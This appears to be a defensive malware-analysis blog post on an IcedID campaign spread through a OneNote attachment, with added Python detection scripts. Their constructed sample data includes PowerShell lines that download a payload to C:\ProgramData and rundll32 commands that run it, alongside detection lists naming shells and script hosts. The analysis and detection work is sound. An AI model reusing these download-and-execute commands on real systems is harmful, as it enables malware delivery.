So I recently came across an interesting Microsoft OneNote file, seen in the wild, being
distributed via email campaigns. Microsoft OneNote is a note-taking application
that is used daily by millions of people, which is exactly what makes the lure
effective: users tend to open OneNote attachments without hesitation and click
the buttons they see on the page.
Kill Chain
This campaign has an interesting
kill chain that starts with an email and proceeds until it drops and executes
the final malware payload on the victim machine. To get a better understanding
of this campaign, see the kill chain given below.
(Fig. Cyber Kill Chain)
The campaign propagates a Microsoft
OneNote file named Payment_02_16_#522.one
whose content is written to entice the victim both to read it and to click on
it. The OneNote file asks the user to click the Open button in order to
receive the attachments from the cloud.
(Fig. Payment_02_16_#522.one)
As soon as the user clicks the
Open button the infection chain begins on the victim machine. A careful user
would immediately notice, on hovering over the Open button, that there is an
embedded .cmd file named 638121336423209150.cmd, and that this is what gets
executed in the background once the button is clicked.
(Fig. Embedded Batch Script)
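The quickest way to confirm what sits behind a OneNote button is to carve the embedded objects straight out of the .one file rather than trusting the hover text. The following is an added example, not code from the original post: it scans for the on-disk guidHeader of a FileDataStoreObject (the structure OneNote uses to store embedded files), reads the 8-byte length that follows it, skips the 12 bytes of unused/reserved fields, and classifies each payload by its magic bytes or script-like content. The sample input is a constructed byte blob with two such objects, not a real OneNote file, and the embedded script text, URL and file names in it are made up.

```python
import hashlib
import struct

# guidHeader of a FileDataStoreObject (MS-ONESTORE), as the 16 bytes appear on disk.
FILE_DATA_HEADER = bytes.fromhex("E716E3BD65261145A4C48D4D0B7A9EAC")
# guidHeader (16) + cbLength (8) + unused (4) + reserved (8) precede the FileData bytes.
FILE_DATA_PREAMBLE = 36

# Magic bytes used to decide what an embedded blob really is, whatever its name claims.
MAGIC = {
    b"MZ": "pe",
    b"%PDF": "pdf",
    b"\x89PNG": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF8": "gif",
}
# Substrings that mark plain-text payloads worth a closer look (assumed list, extend as needed).
SCRIPT_MARKERS = (b"powershell", b"cmd ", b"@echo off", b"%comspec%", b"rundll32", b"mshta", b"wscript")


def sniff_type(data: bytes) -> str:
    """Classify a payload by its leading bytes, falling back to text/unknown."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    try:
        data.decode("ascii")
        return "text"
    except UnicodeDecodeError:
        return "unknown"


def carve_embedded_files(one_bytes: bytes) -> list:
    """Return every FileDataStoreObject payload found in a OneNote section file."""
    found = []
    pos = one_bytes.find(FILE_DATA_HEADER)
    while pos != -1:
        length_off = pos + len(FILE_DATA_HEADER)
        if length_off + 8 > len(one_bytes):
            break
        (cb_length,) = struct.unpack_from("<Q", one_bytes, length_off)
        data_off = pos + FILE_DATA_PREAMBLE
        data = one_bytes[data_off:data_off + cb_length]
        if len(data) != cb_length:
            break  # object runs past end of file: truncated or corrupt, do not emit partial data
        found.append({
            "offset": pos,
            "size": cb_length,
            "type": sniff_type(data),
            "sha256": hashlib.sha256(data).hexdigest(),
            "data": data,
        })
        pos = one_bytes.find(FILE_DATA_HEADER, data_off + cb_length)
    return found


def suspicious_embeds(one_bytes: bytes) -> list:
    """Embedded objects a reviewer should open first: executables and script-like text."""
    hits = []
    for e in carve_embedded_files(one_bytes):
        if e["type"] == "pe":
            hits.append(e)
        elif e["type"] == "text" and any(m in e["data"].lower() for m in SCRIPT_MARKERS):
            hits.append(e)
    return hits


def build_file_data_store_object(payload: bytes) -> bytes:
    """Constructed test helper: wrap a payload the way OneNote stores an embedded file."""
    return FILE_DATA_HEADER + struct.pack("<Q", len(payload)) + b"\x00" * 12 + payload


# Constructed sample: not a real .one file, just two FileDataStoreObjects surrounded by filler.
SAMPLE_SCRIPT = (b"@echo off\r\n"
                 b"powershell -w hidden -c \"iwr https://example.invalid/i.gif -o C:\\ProgramData\\i.jpg\"\r\n")
SAMPLE_ONE = (b"\x00" * 64
              + build_file_data_store_object(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
              + b"\x00" * 8
              + build_file_data_store_object(SAMPLE_SCRIPT)
              + b"\xff" * 4)

if __name__ == "__main__":
    for e in suspicious_embeds(SAMPLE_ONE):
        print(f"offset={e['offset']} size={e['size']} type={e['type']} sha256={e['sha256']}")
```

Run it against a real sample by reading the .one file into `one_bytes`; the hashes it prints can be compared directly against the ones in this post. Note that the carver deliberately trusts the length field only as far as the file actually extends, so a corrupt or truncated object stops the scan instead of producing a bogus hash.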
This is the batch script embedded in the OneNote
lure discussed above. It is a highly obfuscated
batch script that needed some de-obfuscation to get a better understanding of
what it is doing.
(Fig. Obfuscated 638121336423209150.cmd)
Once de-obfuscated we can clearly see that the
batch script launches PowerShell to download the next-stage payload.
(Fig. De-obfuscated batch script executing PowerShell)
This PowerShell command downloads the next-stage
payload from https://healthelevation360[.]com/image/015[.]gif. Notably, the
file is served as a .gif but is saved to disk as xLeI.jpg in the
C:\ProgramData directory, so neither the extension on the server nor the one
on disk says anything about what the file actually is.
(Fig. 015.gif)
healthelevation360[.]com is clearly a legitimate health and fitness domain that
has been compromised and abused by the threat actors to distribute the malware files.
(Fig. Compromised healthelevation360[.]com domain)
xLeI.jpg (168e8a92e64f024346dd703ed9356f4e0bdf7d2130048e68da36291bbc9421a1)
This is the file downloaded and
saved to the victim's disk in C:\ProgramData under an image extension. Digging
into it shows that it is actually a 64-bit DLL (Dynamic Link Library), which
the PowerShell command from the previous stage runs using rundll32.
(Fig. 168e8a92e64f024346dd703ed9356f4e0bdf7d2130048e68da36291bbc9421a1)
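Every step of the chain so far is visible in ordinary process-creation telemetry: OneNote spawns cmd.exe to run the embedded .cmd, cmd.exe spawns PowerShell, and PowerShell spawns rundll32.exe with a "picture" from C:\ProgramData as its argument. The following is an added example (not code from the original post) of two detection rules run over constructed Sysmon-style process events. The first fires at the very first step, when OneNote launches a shell; the second fires when rundll32 is handed a file with an image extension and raises the severity if OneNote is anywhere in the lineage. The PIDs, local paths, the example.invalid URL and the `#1` export in the sample events are made up; only the file names come from this post.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """The fields of a process-creation event we need (Sysmon Event ID 1 carries all of them)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# rundll32 being handed a file whose extension claims it is a picture.
IMAGE_EXT_RE = re.compile(r"\.(jpe?g|gif|png|bmp)\b", re.IGNORECASE)
# Shells and script hosts OneNote should not normally launch (assumed list; extend as needed).
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events, pid: int) -> list:
    """Walk parent pointers from pid upwards; returns events child-first."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)  # guard against PID reuse creating a cycle
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def detect(events) -> list:
    """Two rules covering the OneNote -> cmd -> PowerShell -> rundll32 chain."""
    alerts = []
    by_pid = {e.pid: e for e in events}
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = basename(parent.image) if parent else ""
        # Rule 1: fires at the first step, when OneNote launches a shell or script host.
        if parent_name == "onenote.exe" and name in SHELLS:
            alerts.append({"rule": "onenote_spawns_shell", "pid": e.pid,
                           "severity": "medium", "cmdline": e.cmdline})
        # Rule 2: rundll32 loading a "picture"; severity rises if OneNote is in the lineage.
        if name == "rundll32.exe" and IMAGE_EXT_RE.search(e.cmdline):
            lineage = [basename(p.image) for p in reversed(ancestry(events, e.pid))]
            severity = "high" if "onenote.exe" in lineage else "medium"
            alerts.append({"rule": "rundll32_image_extension", "pid": e.pid,
                           "severity": severity, "lineage": lineage})
    return alerts


# Constructed sample telemetry (not real logs). PIDs, local paths, URL and export name are made up.
SAMPLE_EVENTS = [
    ProcEvent(400, 100, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(500, 400, r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
              r'"ONENOTE.EXE" "C:\Users\user\Downloads\Payment_02_16_#522.one"'),
    ProcEvent(600, 500, r"C:\Windows\System32\cmd.exe",
              r'cmd /c "C:\Users\user\AppData\Local\Temp\638121336423209150.cmd"'),
    ProcEvent(700, 600, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -w hidden -c "iwr https://example.invalid/image/015.gif -o C:\ProgramData\xLeI.jpg"'),
    ProcEvent(800, 700, r"C:\Windows\System32\rundll32.exe", r"rundll32 C:\ProgramData\xLeI.jpg,#1"),
    # Control case: a legitimate rundll32 invocation that must not fire.
    ProcEvent(900, 400, r"C:\Windows\System32\rundll32.exe",
              r"rundll32 C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Rule 1 is the one worth tuning first: it catches the chain before anything is downloaded, and in most environments OneNote spawning cmd.exe or powershell.exe is rare enough to alert on directly. Rule 2 is noisier on its own (rundll32 has many legitimate uses) but the image-extension argument is a strong signal regardless of parent.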
This is none other than the
64-bit IcedID (a.k.a. BokBot) malware payload being distributed in the wild. The
payload starts by fingerprinting the victim system and then sends a GET request
with a customised cookie value to the Command & Control domain azergapolak[.]com.
(Fig. GET Request with a Cookie using WinHttpSendRequest)
One of the most important parts of
an IcedID campaign is the information it passes to the C2 before the
next-stage payload is dropped and the victim is fully infected. This
information is passed in the form of a cookie value.
(Fig. Cookie with rich information about victim)
This cookie has 6 important values that the C2 uses in order
to determine whether or not to continue infecting this victim machine.
· __gads: the campaign identifier, a flag (always set to 1), the time elapsed since the system came up (using GetTickCount64) and system information (using ZwQuerySystemInformation)
· _gat: the Windows version the victim is running, pulled using RtlGetVersion
· _ga: information about the processor, pulled using the cpuid instruction
· _u: victim identity such as the computer name (using GetComputerNameExA), the username (using GetUserNameA) and the result of VM detection
· __io: the domain identifier, pulled from the SID
· _gid: the network adapters on the local victim machine
This information is sent to the
C2 domain in the form of a cookie, and based on the response from the C2 the
next-stage payload gets dropped onto the victim machine. Unfortunately, the C2
was down at the time of writing and the payload could not be retrieved from
the C2 (404 error).
(Fig. Response from C2 Domain)
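Because the beacon is a plain GET with the fingerprint packed into the Cookie header, it is easy to match in proxy or IDS logs without decoding the values. The following is an added example, not code from the original post: a minimal HTTP request parser plus a check that splits the Cookie header and compares the cookie names against the six listed above. The verdict is "icedid_beacon" only for a GET carrying all six names; `_ga`, `_gid` and `_gat` are ordinary Google Analytics cookie names, so a partial match on those alone is expected in benign traffic and is reported separately. The sample requests are constructed (hosts, paths and cookie values are made up).

```python
# Cookie names IcedID's first beacon uses, as listed above.
ICEDID_COOKIE_NAMES = frozenset({"__gads", "_gat", "_ga", "_u", "__io", "_gid"})


def parse_cookie_header(value: str) -> dict:
    """Split a Cookie header into {name: value}; tolerates empty segments and '=' in values."""
    cookies = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, val = part.partition("=")
        cookies[name.strip()] = val.strip()
    return cookies


def parse_request(raw: str) -> tuple:
    """Minimal HTTP/1.x request-line and header parser (body is ignored)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        if ":" in line:
            key, val = line.split(":", 1)
            headers[key.strip().lower()] = val.strip()
    return method, target, headers


def check_request(raw: str) -> dict:
    """Classify one request by how many of the six IcedID cookie names it carries."""
    method, target, headers = parse_request(raw)
    cookies = parse_cookie_header(headers.get("cookie", ""))
    matched = sorted(ICEDID_COOKIE_NAMES & set(cookies))
    if method == "GET" and len(matched) == len(ICEDID_COOKIE_NAMES):
        verdict = "icedid_beacon"      # full set of six on a GET: the pattern described above
    elif matched:
        verdict = "partial"            # common GA names only: expected in benign traffic
    else:
        verdict = "clean"
    return {"host": headers.get("host", ""), "method": method, "target": target,
            "matched": matched, "verdict": verdict}


# Constructed sample traffic (made-up hosts, paths and cookie values; not captured data).
SAMPLE_BEACON = (
    "GET / HTTP/1.1\r\n"
    "Host: c2.example.invalid\r\n"
    "Cookie: __gads=AAAA; _gat=BBBB; _ga=CCCC; _u=DDDD; __io=EEEE; _gid=FFFF\r\n"
    "Connection: close\r\n\r\n"
)
SAMPLE_BENIGN = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.invalid\r\n"
    "Cookie: _ga=GA1.2.1; _gid=GA1.2.2; _gat=1\r\n\r\n"
)
SAMPLE_NO_COOKIE = "GET /robots.txt HTTP/1.1\r\nHost: www.example.invalid\r\n\r\n"

if __name__ == "__main__":
    for raw in (SAMPLE_BEACON, SAMPLE_BENIGN, SAMPLE_NO_COOKIE):
        print(check_request(raw))
```

Feed it one request at a time from a proxy log or a PCAP's reassembled HTTP streams; the host in a full match is a candidate C2 to pivot on, and the `_u` value is where the victim's computer name and username travel, so it is also the field to pull for scoping which hosts checked in.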
C2 Domain Analysis
The C2 domain is quite newly
registered, dated 18/11/2022, which can be verified from the domain's WHOIS
information.
(Fig. C2 Domain WhoIs information)
We can see that the domain is
registered under Charlestown, KN (KN being the country code for Saint
Kitts and Nevis, a country in the Caribbean). The domain is hosted on some
interesting name servers whose TLDs are .no (Norway), .fo (Faroe Islands) and .in
(India).
MITRE ATT&CK Mapping
Tactic | Technique(s)
Initial Access | T1566.001 - Phishing: Spearphishing Attachment
Execution | T1059.001 - Command and Scripting Interpreter: PowerShell; T1059.003 - Command and Scripting Interpreter: Windows Command Shell
Defense Evasion | T1497.001 - Virtualization/Sandbox Evasion: System Checks; T1218.011 - System Binary Proxy Execution: Rundll32; T1036 - Masquerading
Discovery | T1033 - System Owner/User Discovery; T1082 - System Information Discovery
Command and Control | T1071.001 - Application Layer Protocol: Web Protocols
Exfiltration | T1041 - Exfiltration Over C2 Channel